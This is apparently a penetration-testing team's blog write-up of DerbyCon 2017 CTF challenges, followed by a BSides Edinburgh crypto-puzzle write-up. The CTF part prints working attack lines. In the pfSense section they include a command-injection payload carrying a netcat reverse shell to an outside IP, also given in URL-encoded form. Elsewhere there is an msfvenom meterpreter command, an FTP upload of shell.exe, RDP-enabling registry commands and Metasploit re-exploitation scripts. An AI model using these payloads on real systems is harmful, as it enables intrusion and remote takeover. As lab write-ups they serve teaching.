While browsing the web root directory (directory listings enabled) on the 172.30.1.231 web server, we came across a file called jacked.html. When rendered in the browser, that page references an image called turtles.png, but that didn’t show when viewing the page. There was a bit of a clue in the page’s title “I Like Turtles”… we guess somebody loves shells!

When viewing the client side source of the page, we saw that there was a data-uri for the turtle.png image tag, but it looked suspiciously short.

Using our favourite Swiss army tool of choice, LinqPad (https://www.linqpad.net/ – we promise we don’t work for them!), to Base64 decode the data-uri string, we saw that this was clearly an escape sequence. Decoding further into ASCII, we had a big clue – that looks a lot like shellcode in there.

The escape sequence definitely had the look of x86 about it, so back to LinqPad we went in order to run it. We have a basic shellcode runner that we sometimes need. Essentially, it opens notepad (or any other application of your choosing) as a process and then allocates memory in that process. The shellcode is written into that allocation and then a thread is kicked off, pointing at the top of the shellcode. The script is written with a break in it so that, after notepad is launched, you have time to attach a debugger. The last two bytes were CD 80, which translates to int 80 (the system call handler interrupt on Linux, and a far superior rapper to Busta).

Attaching to the process with WinDbg and hitting go in LinqPad, the int 80 was triggered, which fired an Access Violation within WinDbg. This exception was then caught, allowing us to examine memory.

Once running WinDbg we immediately spotted a problem: int 80h is the Linux system call handler interrupt, so this was obviously designed to be run under a different OS. Oops. Oh well, let's see what we could salvage.

One point that is important to note is that when making a system call on Linux, values are passed from user land to the kernel via registers. EAX contains the system call number, then EBX, ECX, EDX, ESI and EDI take the parameters to the call, in that order. The shellcode translates as follows; XORing a register with itself is used as a quick way to zero out a register.

What we saw here was that the immediate value 4 was being moved into the first byte of the EAX register (known as AL). This translates to the system call sys_write, which effectively has the prototype ssize_t write(int fd, const void *buf, size_t count).

Based upon the register order above, this prototype and the assembly, we could see that EBX contained a value of 1 (stdout), ECX contained the stack pointer, which is where the flag was located, and EDX held a value of 12h (18 decimal), which corresponds to the length of the string.

So yes, had this been run on a Linux OS we would have had the flag nicely written to the console rather than an access violation, but all was not lost. We knew the stack contained the flag, so all we needed to do was examine the memory pointed to by the ESP register (the stack pointer). In WinDbg you can dump memory in different formats using d followed by a second letter indicating the format. For example, in the screenshot below the first command is dd esp, which dumps memory in DWORD (4 byte) format – by default 32 of them, returning 128 bytes of memory. The second command shown is da esp, which dumps memory in ASCII format until it hits a null character or has read 48 bytes.

iLibrarian

When browsing to the 172.30.1.236 web server, we found the iLibrarian application hosted within a directory of the same name. The first two notable points about this site were that we had a list of usernames in a drop down menu (very curious functionality) and, at the bottom of the page, a version number. There was also the ability to create a user account.

When testing an off the shelf application, the first few steps we perform are to attempt to locate default credentials, identify the version number and then obtain the source or binaries if possible. The goal here is to make the test as white box as possible.

A good source of information about recent changes to a project is the issues tab on GitHub. Sometimes, security issues will be listed. As shown below, on the iLibrarian GitHub site one of the first issues listed was “RTF Scan Broken”. Interesting title; let’s dig a little further.

There was a conversion to RTF error, apparently, although very little information was given about the bug.

We looked at the diff of the change. The following line looked interesting.

The next step was to check out the history of changes to the file.

The first change listed was for a mistyped variable bug, which didn’t look like a security issue. The second change looked promising, though.

The escaping of shell arguments is performed to ensure that a user cannot supply data that breaks out of the intended system command and starts performing the user's own actions against the OS. The usual methods of breaking out include back ticks, line breaks, semi colons, apostrophes and so on. This type of flaw is well known and is referred to as command injection. In PHP, the language used to write iLibrarian, the mitigation is usually to wrap any user supplied data in a call to escapeshellarg().

Looking at the diff for the “escape shell arguments” change, we could see that it called escapeshellarg() on two parameters that are passed to the exec() function (http://php.net/manual/en/function.exec.php).

Viewing the version before this change, we saw the following key lines.

Firstly, a variable called $temp_file is created. This is set to the current temporary path plus the value of the filename that was passed during the upload of the manuscript file (manuscript being the name of the form variable). The file extension is then obtained from the $temp_file variable and, if it is either doc, docx or odt, the file is converted.

The injection was within the conversion shown in the third highlight. By providing a command value that breaks out, we should have command injection.

Cool. Time to try and upload a web shell. The following payload was constructed and uploaded.

This created a page that would execute any value passed in the cmd parameter. It should be noted that during a proper penetration test, when exploiting issues like this, a predictable name such as test4.php should NOT be used, lest it be located and abused by someone else (we typically generate a name from multiple GUIDs) and, ideally, there should be some built-in IP address restrictions. However, this was a CTF and time was of the essence. Let's hope no other teams found our obviously named newly created page!

The file had been written. Time to call test4.php and see who we were running as.

As expected, we were running as the web user and had limited privileges. Still, this was enough to clean up some flags. We decided to upgrade our access to the operating system by using a fully interactive shell – obtained using the same attack vector.

Finally, we looked for a privilege escalation. The OS was Ubuntu 15.04 and one Dirty Cow later, we had root access and the last flag from the box.

Webmin

This box had TCP ports 80 and 10000 open. Port 80 ran a webserver that hosted a number of downloadable challenges, while port 10000 was what appeared to be Webmin.

Webmin was an inviting target because its version appeared to be vulnerable to a number of publicly available flaws that would suit our objective. However, none of the exploits appeared to be working. We then removed the blinkers and stepped back.

The web server on port 80 leaked the OS in its server banner; none other than North Korea’s RedStar 3.0. Aha – not so long ago @hackerfantastic performed a load of research on RedStar and if memory served, the results were not good for the OS. Sure enough…

A quick bit of due diligence on the exploit, then we simply set up a netcat listener, ran the exploit with the appropriate parameters and – oh look – immediate root shell. Flag obtained; fairly low value, and rightfully so. Thanks for the stellar work @hackerfantastic!

Dup Scout

This box ran an application called Dup Scout Enterprise.

It was vulnerable to a remote code execution vulnerability, an exploit for which was easily found on exploit-db.

We discovered that the architecture was 32 bit by logging in with admin:admin and checking the system information page. The only thing we had to do for the exploit to work on the target was change the shellcode provided by the out of the box exploit to suit a 32 bit OS. This can easily be achieved by using msfvenom:

  • msfvenom -p windows/meterpreter/reverse_https LHOST=172.16.70.242 LPORT=443 EXITFUNC=none -e x86/alpha_mixed -f python

Before we ran the exploit against the target server, we set up the software locally to check it would all work as intended. We then ran it against the production server and were granted a shell with SYSTEM level access. Nice and easy.

X86-intermediate.binary

To keep some reddit netsecers in the cheap seats happy this year, yes we actually had to open a debugger (and IDA too). We’ll walk you through two of the seven binary challenges presented.

By browsing the 172.30.1.240 web server, we found the following directory containing 7 different binaries. This section will go through the x86-intermediate one.

By opening it up in IDA and heading straight to the main function, we found the following code graph:

Roughly, this translates as checking if the first parameter passed to the executable is -p. If so, the next argument is stored as the first password. This is then passed to the function CheckPassword1 (not the actual name, this has been renamed in IDA). If this is correct the user is prompted for the second password, which is checked by CheckPassword2. If that second password is correct, then the message “Password 2: good job, you’re done” is displayed to the user. Hopefully, this means collection of the flag too!

By opening the CheckPassword1 function, we immediately saw that an array of chars was being built up. A pointer to the beginning of this array was then passed to _strcmp along with the only argument to this function, which was the password passed as p.

We inspected the values going into the char array and they looked like lower case ASCII characters. Decoding these led to the value the_pass.

Passing that value to the binary with the p flag, we got the following:

Cool, so time for the second password. Jumping straight to the CheckPassword2 function, we found the following at the beginning of the function. Could it be exactly the same as the last function?

Nope, it was completely different, as the main body of the function shown in the following screenshot illustrates. It looks a bit more complicated than the last one…

Using the excellent compiler tool hosted at https://godbolt.org/ it roughly translates into the following:

The method to generate the solution here was to adapt this code into C# (yes, once again in LinqPad, and nowhere near as difficult as it sounds), this time to run through each possible character combination and check whether the generated value matched the stored hash.

Running it, we found what we were looking for – @12345!) and confirmed it by passing it into the exe.

In order to get the flag, we just needed to combine the two to give the_pass@12345!) which, when submitted, returned us 500 points.

arm-hard.binary

The file arm-hard.binary contained an ELF executable which spelled out a flag by writing successive characters to the R0 register. It did this using a method which resembles Return Oriented Programming (ROP), whereby a list of function addresses is pushed onto the stack, and then as each one returns, it invokes the next one from the list.

ROP is a technique which would more usually be found in shellcode. It was developed as a way to perform stack-based buffer overflow attacks, even if the memory containing the stack is marked as non-executable. The fragments of code executed – known as ‘gadgets’ – are normally chosen opportunistically from whatever happens to be available within the code segment. In this instance there was no need for that, because the binary had been written to contain exactly the code fragments needed, and ROP was merely being used to obfuscate the control flow.

To further obfuscate the behaviour, each of the characters was formed by adding an offset to the value 0x61 (ASCII a). This was done from a base value in register R1 (calculated as 0x5a + 0x07 = 0x61):

For example, here is the gadget for writing a letter n to R0 (calculated as 0x61 + 0x0d = 0x6e):

and here is the gadget for a capital letter B:

The gadget addresses were calculated as offsets too, from a base address held in register R10 and equal to the address of the first gadget ( 0x853c). For example:

Here the address placed in R11 by the first instruction is equal to 0x853c + 0x30 = 0x856c, which as we saw above is the gadget for writing the letter n. The second instruction pushes it onto the stack. By stringing a sequence of these operations together it was possible to spell out a message:

The gadgets referred to above correspond respectively to the letters n, o, c, y, b, r, e and d. Since the return stack operates on the principle of first-in, last-out, they are executed in reverse order and so spell out the word derbycon (part of the flag). To start the process going, the program simply popped the first gadget address off the stack then returned to it:

The full flag, which took the form of an e-mail address, was found by extending this analysis to include all of the gadget addresses pushed onto the stack:

  • BlahBlahBlahBobLobLaw@derbycon.com

NUKELAUNCH & NUKELAUNCHDB

We noticed that a server was running IIS 6 and had WebDAV enabled. Experience led us to believe that this combination meant it would likely be vulnerable to CVE-2017-7269. Fortunately for us, there is publicly available exploit code included in the Metasploit framework:

The exploit ran as expected and we were able to collect a number of basic flags from this server.

Once we'd collected all of the obvious flags, we began to look at the server in a bit more detail. We ran a simple net view command and identified that the compromised server, NUKELAUNCH, could see a server named NUKELAUNCHDB.

A quick port scan from our laptops indicated that this server was live, but had no ports open. However, the server was in scope so there must be a way to access it. We assumed that there was some network segregation in place, so we used the initial server as a pivot point to forward traffic.

Bingo, port 1433 was open on NUKELAUNCHDB, as long as you routed via NUKELAUNCH.

We utilized Metasploit's built in pivoting functionality to push traffic to NUKELAUNCHDB via NUKELAUNCH. This was set up by simply adding a route, something similar to route add NUKELAUNCHDB 255.255.255.255 10, where 10 was the session number we wished to route through. We then started Metasploit's SOCKS proxy server. This allowed us to utilize other tools and push their traffic to NUKELAUNCHDB through proxychains.

At this stage, we made some educated guesses about the password for the sa account and used CLR-based custom stored procedures (http://sekirkity.com/command-execution-in-sql-server-via-fileless-clr-based-custom-stored-procedure/) to gain access to the underlying operating system on NUKELAUNCHDB.

ACMEWEAPONSCO

From the HTTP response headers, we identified this host was running a vulnerable version of Home Web Server.

Some cursory research led to the following exploit-db page:

It detailed a path traversal attack which could be used to execute binaries on the affected machine. Initial attempts to utilise this flaw to run encoded PowerShell commands were unsuccessful, so we had a look for other exploitation vectors.

The web application had what appeared to be file upload functionality, but it didn’t seem to be fully functional.

There was, however, a note on the page explaining that FTP could still be used for uploads, so that was the next port of call.
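
Uploads over FTP need nothing more than a one-liner; for example, with curl (host, credentials and file name here are all placeholders):

  • curl -T shell.exe ftp://<ACMEWEAPONSCO-IP>/ --user anonymous:anonymous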

Anonymous FTP access was enabled, so we were able to simply log in and upload an executable. At this stage we could upload files to the target system and run binaries; the only thing missing was that we didn’t know the full path to the binary we’d uploaded. Fortunately, there was a text file in the cgi-bin detailing the upload configuration:

The only step remaining was to run the binary we’d uploaded. The following web request did the job and we were granted access to the system.

The flags were scattered around the filesystem and the MSSQL database. One of the flags was found on the user’s desktop in a format that required graphical access, so we enabled RDP to grab that one.
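
For completeness, enabling RDP from a shell on a Windows box generally comes down to flipping a registry value and opening the firewall, along these lines:

  • reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • netsh advfirewall firewall set rule group="remote desktop" new enable=Yes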

pfSense

This challenge was based on a vulnerability discovered by Scott White (@s4squatch) shortly before DerbyCon 2017. It wasn’t quite a 0day (Scott had reported it to pfSense and it was vaguely mentioned in the patch notes) but there was very limited public information about this at the time of the CTF.

The box presented us with a single open TCP port: 443, offering an HTTPS-served website. Visiting the site revealed the login page of an instance of the open source firewall software pfSense.

https://www.cyberciti.biz/media/new/faq/2015/02/pfsense-login-1.jpg

We attempted to guess the password. The typical default username and password is admin:pfsense; however this, along with a few other common admin:<password> combinations, failed to grant us entry.

After a short while, we changed the user to pfsense and tried a password of pfsense, and we were in. The pfsense user provided us with a small number of low value flags.

At first glance, the challenge seemed trivial. pfSense has a page called exec.php that can call system commands and run PHP code. However, we soon realised that the pfsense user held almost no privileges. We only had access to a small number of pages. We could install widgets, view some system information – including version numbers – and upload files via the picture widget. Despite all this, there appeared to be very little in the way of options to get a shell on the box.

We then decided to grab a directory listing of all the pages provided by pfSense. We grabbed a copy of the software and copied all of the page paths and names from the file system. Then, using the resulting list in combination with the DirBuster tool for automation, we requested every page to determine whether there was anything else that we did have access to. Two pages returned an HTTP 200 OK status.

  • index.php – We already have this.
  • system_groupmanager.php – Hmm…
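
Generating the page list itself was nothing clever; with a copy of the pfSense source unpacked locally, something along these lines does the job (the path to the web root varies between versions):

  • find pfSense-2.2.6/usr/local/www -name '*.php' -exec basename {} \; | sort -u > pfsense_pages.txt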

Browsing to system_groupmanager.php yielded another slightly higher value flag.

This page is responsible for managing members of groups and the privileges they have; awesome! We realised our user was not a member of the “admin” group, so we made that happen and… nothing. No change to the interface and no ability to access a page like exec.php.

A few hours were burned looking for various vulnerabilities, but to no avail. When looking at the source code, nothing immediately jumped out as vulnerable within the page itself, but then pfSense does make heavy use of includes and our review was a fairly manual affair.

With time passing, a Google search for “system_groupmanager.php exploit” was performed and… urgh, why didn’t we do that straight away? Sleep deprivation was probably why.

There was a brief description of the vulnerability and a link to the actual pfSense security advisory notice:

A little more information was revealed, including the discoverer of the issue, who just so happened to be sitting at the front, on the stage, as one of the CTF crew: Scott White from TrustedSec. Heh. This confirmed that we were likely on the right track. However, he had not provided any public proof-of-concept code, and searches did not reveal any authored by anyone else either.

The little information provided in the advisory included this paragraph:

“A command-injection vulnerability exists in auth.inc via system_groupmanager.php.

This allows an authenticated WebGUI user with privileges for system_groupmanager.php to execute commands in the context of the root user.”

With a specific file to target for code review, finding the vulnerability would be considerably easier, but we could do better than that.

pfSense is an open source project which uses GitHub for its version control. By reviewing the commit history associated with auth.inc we quickly identified the affected lines of code, further simplifying our search for the vulnerability. Even better, the information contained within the footer of the security advisory revealed the patched version of the software (2.3.1), further narrowing the timeline of our search.
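
In practice this is just a matter of walking the commit history for that one file; for example (the in-repo path shown here is the current layout and may differ on older branches):

  • git clone https://github.com/pfsense/pfsense && cd pfsense
  • git log -p --follow -- src/etc/inc/auth.inc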

Having identified the particular line of code, we could then understand the execution pathway:

  1. A numeric user ID is submitted within code contained in /usr/local/www/system_groupmanager.php
  2. This is passed to the local_group_set() function within /etc/inc/auth.inc as a PHP array.
  3. An implode() is performed on the incoming array to turn the array object into a single string object, concatenated using commas.
  4. This is then passed, without first undergoing any kind of escaping or filtering, to a function called mwexec(), which appears to call the system binary /usr/sbin/pw with the stringified array now forming part of its arguments.

In order to exploit this vulnerability, we needed to break out of the string with a quote and supply a suitable command.

Initial attempts made directly against the production box resulted in failure. As the injection was blind and didn’t return information to the web page, we opted to use the ping command and then monitored incoming traffic using Wireshark to confirm success.
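
A plain tcpdump filter does the same job as Wireshark here (interface and address are placeholders):

  • tcpdump -ni <interface> icmp and host <pfSense-IP>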

Despite having a good understanding of what was happening under the hood, something was still failing. We stood up a test environment with the same version of the pfSense software (2.2.6) and tried the same command. This led to the same problem: no command execution. However, as we had administrative access to our own instance, we could view the system logs and the errors being caused.

Somehow, either /sbin/ping or the IP address was being reported as an invalid user ID by the pw application, suggesting that the string escape was not wholly successful and that /usr/bin/pw was in fact treating our command as one of its own command-line arguments, which was not what we wanted.

Some more playing with quotes and escape sequences followed, before the following string resulted in a successful execution of ping and ICMP packets flooded into our network interfaces.

  • 0';/sbin/ping -c 1 172.16.71.10; /usr/bin/pw groupmod test -g 2003 -M '0

Attempting the same input on the live CTF environment also resulted in success. We had achieved command execution. At the time, no one had rooted the box and there was a need for speed if we wanted to be the winners of the challenge coin offered by @DerbyconCTF on Twitter.

On reflection, we believe this could be made much more succinct with:

  • 0';/sbin/ping -c 1 172.16.71.10;'

We think all of our escaping problems came down to terminating the command with the appropriate number of quotes but, as previously stated, during the competition we went with the longer version as it just worked.

Next step… how do we get a shell?

pfSense is a cut-down version of FreeBSD under the hood. There is no wget and there is no curl. Yes, we could have written something into the web directory using cat, but instead we opted for a traditional old-school Linux reverse shell one-liner. Thank you to @PentestMonkey and his cheat sheet (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet):

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.71.10 12345 >/tmp/f

We fired up a netcat listener on our end and used the above as part of the full parameter:

  • 0'; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.71.10 12345 >/tmp/f;/usr/sbin/pw groupmod test -g 2003 -M '0

Or, when URL encoded as part of the members parameter in the POST request:

  • &members=%5B%5D=0'%3brm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+172.16.71.10+12345+>/tmp/f%3b/usr/sbin/pw+groupmod+test+-g+2003+-M+'0
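
The listener on our side was nothing more exotic than netcat bound to the port referenced in the payload, something like:

  • nc -lvnp 12345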

With the attack string worked out, we triggered the exploit by moving a user into a group and hitting save.

Apologies for the quality of the following photographs – blame technical problems!

This caused the code to run and create a reverse connection back to us, allowing us to capture the final flag of the pfSense challenge, contained in /root/flag.txt.

And with that, we obtained 5000 points, along with the first of two TrustedSec challenge coins awarded to our team.

DPRK Strategic Missile Attack Planner

This box presented a text based game over telnet.

We thought that this box was going to be a lot harder than it turned out to be and, after spending a while trying a few things, we made a tactical decision to ignore it. Somewhat frustratingly for us, that was the wrong move and compromising this box turned out to be very achievable.

From the help command, we thought that it might be Ruby command injection. After chatting with the SwAG team after the end of the CTF, we learned that this was correct and that it was a case of finding the correct spot to inject Ruby commands. Props to SwAG and other teams for getting this one, and thanks to the DerbyCon CTF organisers for allowing us to grab some screenshots after the competition had finished in order to share this with you. We’ll share what we know about this box, but wish to make it clear that we failed to root it during the competition.

We were supplied with a help command, which led us to suspect Ruby command injection was at play. The help command printed out various in-game commands as well as public/private functions. A small sample of these were as follows:

  • target=
  • position
  • position=
  • id
  • yield=
  • arm!
  • armed?

The ones that helped us to identify that it was Ruby code behind the scenes were:

  • equal?
  • instance_eval
  • instance_exec

We attempted a few attack vectors manually, but we needed a way to automate things; it was taking too long to attempt injection techniques by hand. To do this, we put together a custom script using expect. In case you don’t know about expect, the following is taken directly from Wikipedia:

“Expect, an extension to the Tcl scripting language written by Don Libes, is a program to automate interactions with programs that expose a text terminal interface.”

We often have to throw custom scripts together to automate various tasks, so if you’re not familiar with this it’s worth a look. The code we implemented to automate the task was as follows:

We then took all of the commands from the game and ran them through this expect script:

  • cat commands | xargs -I{} ./expect.sh {} | grep "Enter Command:" -A 1
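
For anyone unfamiliar with expect, a minimal wrapper of the kind used above might look something like the following sketch; the target address and timeout are placeholders, while the “Enter Command:” prompt is the one used by the game:

#!/usr/bin/env bash
# expect.sh <command>: fire a single command at the game over telnet and print the exchange
TARGET=172.16.70.1   # placeholder address
expect <<EOF
set timeout 5
spawn telnet $TARGET
expect "Enter Command:"
send "$*\r"
expect "Enter Command:"
EOF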

After identifying what we thought was the right sequence within the game, we then tried multiple injection techniques with no success. A sample of these is shown below:

  • cat commands | xargs -I{} ./expect.sh {} print 1 | grep "Enter Command:" -A 1
  • cat commands | xargs -I{} ./expect.sh {}&& print 1 | grep "Enter Command:" -A 1
  • cat commands | xargs -I{} ./expect.sh {}|| print 1 | grep "Enter Command:" -A 1
  • cat commands | xargs -I{} ./expect.sh {}; print 1 | grep "Enter Command:" -A 1

We also tried pinging ourselves back with exec or system, as we didn’t know whether the response would be blind or show the results back on the screen:

  • cat commands | xargs -I{} ./expect.sh {} exec(ping 172.16.70.146)

It was not easy to identify the host operating system, so we had to make sure we ran commands that would work on both Windows and Linux. No ports other than telnet were open and you couldn’t even ping the host to find the TTL as there was a firewall blocking all other inbound connections.

In the end, we were not successful.

After discussing this with team SwAG post-CTF, they put us out of our misery and let us know what the injection technique was. It was a case of using the eval statement in Ruby followed by a back-ticked command, for example:
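
In other words, a payload of roughly the following shape (we never found the exact injection point ourselves, so treat this as the general form rather than a known-working string):

  • eval("`id`")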

D’oh! It should also be noted that you couldn’t use spaces in the payload, so if you found the execution point you would have had to get around that restriction, although doing so would be fairly trivial.

Automating re-exploitation

Finally, a quick word about efficiency.

Over the course of the CTF a number of the machines were reset to a known good state at regular intervals because they were crashed by people running unstable exploits that were never going to work *cough*DirtyCOW*cough*. This meant access to compromised systems had to be re-obtained on a fairly regular basis.

In an effort to speed up this process, we threw together some quick scripts to automate the exploitation of some of the hosts. An example of one of them is shown below:
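
Our scripts were nothing elegant; conceptually they were just canned exploit runs chained together. A rough sketch of the idea (addresses here are placeholders, and the module names are the ones already mentioned in this post):

#!/usr/bin/env bash
# Re-pop boxes after a CTF reset: re-run the Metasploit exploits as background jobs,
# then confirm Susan still falls to the SSH key recovered from Elastihax.
ELASTIHAX=10.0.0.20      # placeholder
NUKELAUNCH=10.0.0.30     # placeholder
msfconsole -qx "use exploit/multi/elasticsearch/script_mvel_rce; set RHOST $ELASTIHAX; run -j; use exploit/windows/iis/iis_webdav_scstoragepathfromurl; set RHOST $NUKELAUNCH; run -j"
ssh -i susan_id_rsa susan@10.0.0.10 id   # placeholder address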

It was well worth the small amount of time it took to do this, and by the end of the CTF we had a script that more or less auto-pwned every box we had shell on.

Conclusion

We regularly attend DerbyCon and we firmly believe it to be one of the highest-quality and most welcoming experiences in the infosec scene. We always come away from it feeling reinvigorated in our professional work (once we’ve got over the exhaustion!) and having made new friends, as well as catching up with old ones. It was great that we were able to come first in the CTF, but that was just the icing on the cake. We’d like to extend a big thank you to the many folks who work tirelessly to put on such a great experience – you know who you are!

#trevorforget

BSides Edinburgh 2017 Crypto Contest Write Up

Recently, Ben Turner and I made the trek up to Edinburgh for the inaugural BSides Edinburgh to see our colleague Neil Lines present his talk “The Hunt for The Red DA”. I can’t say that I am a massive fan of such early starts (we jumped on the first flight out of Birmingham), but thankfully the organisers made the trip absolutely worth it. The talks that I saw were well presented and had good technical content, while the venue was absolutely amazing. I even learnt some stuff about the world of IoT that I wished I didn’t know; cheers Ken.

The conference was very well supported by the sponsors, particularly with the solid training on offer. We even recognised the faces of some of the competition from the CTF at DerbyCon. We’re really looking forward to doing battle again later in the year…

The crypto contest

SecureWorks kindly created a challenge for the BSides Edinburgh 2017 audience; they named it the Crypto Contest. Personally, I think one of the core skills of a good penetration tester is being able to quickly deal with data that you are unfamiliar with, and to have a good set of tools that can parse & process it in a flexible way. The contest was a good way to practise some of those skills and demonstrate to my colleagues why pure C# in the world’s best programming tool, LINQPad, is better than PowerShell 😉 Plus, there were some very cool prizes on hand; our eyes quickly zoned in on the Hak5 Bash Bunny.

Challenge number 1 – Square

Navigating to https://www.secureworks.com/~/media/Files/US/Blogs/bsides%20edi%2017/square.ashx, we got the following wall of text:

Now, credit for this goes to Ben; after trying some advanced military-grade cryptographic techniques such as ROT13, he craned his neck and quickly spotted that this was in fact just rotated text. Yep, I was massively overthinking it too! All we had to do was quickly put together some code that would rotate the text 90 degrees around the origin. Firing up LINQPad, we created the following solution (which of course has been tidied up and had comments added).

The following output is produced and the flag is ours:

Sure, we could have put the monitor on its side, but where’s the fun in that?

Challenge 2 – Royale

Opening the page https://www.secureworks.com/~/media/Files/US/Blogs/bsides%20edi%2017/royale.ashx?la=en, you got the following, which was immediately recognisable as Morse code. The instructions stated: “Please decode the following message, adding appropriate spacing as needed so the flag is readable.”

Funnily enough, I had never worked with Morse code before, but the first thing I noticed was that, thankfully, SecureWorks had put spaces in between the prosigns, which made the code a little easier. The first step was to obtain a Morse code library, one that would translate the symbols to letters. This was pretty easy to find with Google and allowed me to build up a CSV file which looked something like this:

Once again using LINQPad, the following code split up all the symbols, translated each one and then converted it all into a string.

This gave us the following result, which is written in the NATO phonetic alphabet.

So, a slight tweak to the code, changing the last line to:

…and the next flag was ours:

Challenge 3 – Dreams

For challenge 3, https://www.secureworks.com/~/media/Files/US/Blogs/bsides%20edi%2017/dreams.ashx?la=en, we received the instructions “Decipher the message from this transmission” and then the following:

The first calculation was the size; the 5 lines contained 1200 bits (150 bytes). Assuming bytes was our first mistake; this had us trying to convert to different text forms and every kind of data type that we could think of, without any luck. Treating the data as raw bits instead, we then tried creating image types, e.g. bitmaps and even QR codes (which in fairness didn’t really align with the size). The path then led to 6-bit characters because, well, 1200 divides by that very nicely. In all honesty, we should have looked into that more closely first, but we didn’t as there was a talk we wanted to see (honest :)).

So, we were back inside the vendor area when the following tweet arrived.

Feel it out… hang on… Braille uses 6 bit characters, right? Bingo! Straight to https://en.wikipedia.org/wiki/Six-bit_character_code#Example_of_six-bit_Braille_codes to look at the Braille glyphs:

The 2×3 column structure lined up very nicely with the text in the transmission. Cool, so time to bash some code out. By this stage, you can probably guess what tool was opened up 🙂

The first step was to once again create a dictionary file that would translate the glyphs to ASCII. For this, we borrowed the text from the wiki page and built a CSV file translating the positions into a letter. It looked like this:

Next was to write some code that translated those positions into characters. We bashed out the following quickly (it’s not perfect but did the job):

We got the following output; there were a couple of manual corrections that we needed to make to get the flag, but it looked like the Bash Bunny might be ours.

Yeah, it was!

Conclusion

While not a crypto contest in the strictest sense of the term, it was still a lot of fun and we got some practice with data formats that we don’t normally come across. As I said at the start, this is an important skill. A big thank you to SecureWorks for putting the time in to create this contest – we really enjoyed it and we hope you all enjoyed our write-up!

– Rob, Ben & Neil

DerbyCon 2016 CTF Write Up

We’ve just got back to work after spending a fantastic few days in Kentucky for DerbyCon 2016. As with previous years, there was an awesome CTF event, so we thought it’d be rude not to participate. This post will provide a walk-through of some of the many interesting challenges.